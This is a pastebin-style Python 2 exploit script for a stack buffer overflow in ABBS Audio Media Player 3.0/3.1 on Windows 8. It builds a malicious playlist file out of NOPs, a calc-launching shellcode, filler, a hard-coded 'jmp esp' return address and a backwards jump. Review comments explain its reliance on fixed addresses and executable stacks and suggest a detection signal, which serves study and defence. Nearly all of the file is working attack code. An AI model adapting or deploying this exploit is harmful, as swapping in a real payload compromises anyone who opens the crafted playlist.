
junk

a guest
May 12th, 2013
#!/usr/bin/env python

# ABBS Audio Media Player (3.0/3.1) Buffer Overflow exploit (M3U/LST)
# Win8
# Rh0
#
# Proof-of-concept generator (Python 2 syntax). It writes "exploit.lst", a
# playlist file holding a single 4117-byte record with no line breaks:
#   5 NOPs + 23 bytes of shellcode + "A" filler up to 4108 bytes,
#   then a 4-byte return-address overwrite and a 5-byte jump.
# The shellcode only calls WinExec("calc", 1), i.e. it is a demonstration
# payload.
#
# NOTE(review): the two absolute addresses (the WinExec pointer inside the
# shellcode and the "jmp esp" pointer in `ret`) are hard-coded for the
# author's system, as the original comments state. The approach depends on
# system DLLs loading at predictable addresses and on the stack being
# executable; ASLR and DEP each remove one of those assumptions.
# NOTE(review): for defenders, the root cause named by the banner below is a
# stack buffer overflow while the player reads an .lst/.m3u file, so the fix
# belongs in the player (bounds-checked parsing). A playlist entry several
# kilobytes long that contains non-printable bytes is presumably a usable
# detection signal - confirm against real playlists.

print "[*] Stack buffer overflow in ABBS Audio Media Player 3.0/3.1[*]"
bufferlen = 4108;               # buffer until return address overwrite
nops = "\x90" * 5;
## WinExec("calc",1)
shellcode = (
            "\x33\xC0"              # xor eax,eax
            "\x50"                  # push eax
            "\x68\x63\x61\x6C\x63"  # push 'calc'
            "\x8B\xDC"              # mov ebx, esp
            "\xB0\x01"              # mov al, 1
            "\x50"                  # push eax
            "\x53"                  # push ebx
            "\xB8\x86\x30\x82\x74"  # mov eax, 0x74823086 ### This may need adjusting (contains &(WinExec@kernel32) - 1)
            "\x04\x01"              # add al, 1
            "\xFF\xD0"              # call eax (WinExec@kernel32.dll = 0x74823087)
            )

ret = "\x54\xad\x42\x76";           # jmp esp @user32.dll (0x7642ad54) This may need adjusting. Enter address which points to "jmp esp"
# NOTE(review): the rel32 operand below decodes to 0xffffefeb (-4117), measured
# from the end of this 5-byte instruction; the "4116" in the original comment
# is approximate.
esp = "\xe9\xeb\xef\xff\xff";       # jmp backwards 4116 bytes

# Assemble the record: NOPs and shellcode first, filler up to `bufferlen`,
# then the return-address overwrite followed by the backwards jump.
# NOTE(review): the name `buffer` shadows the Python 2 builtin of the same name.
buffer  = nops
buffer += shellcode
buffer += "A" * (bufferlen - len(buffer))
buffer += ret;
buffer += esp;

try:
    A = open("exploit.lst","wb")        # exploit works also with .m3u
    A.write(buffer)
    A.close()
    print "[*] exploit.lst created [*]"
# NOTE(review): the bare except reports every failure as a file-creation
# error, and the handle is not closed if write() raises.
except:
    print "[*] Error while creating file [*]"

# Keeps the console window open until the user presses Enter.
print "[*] Enter to continue.. [*]"
raw_input()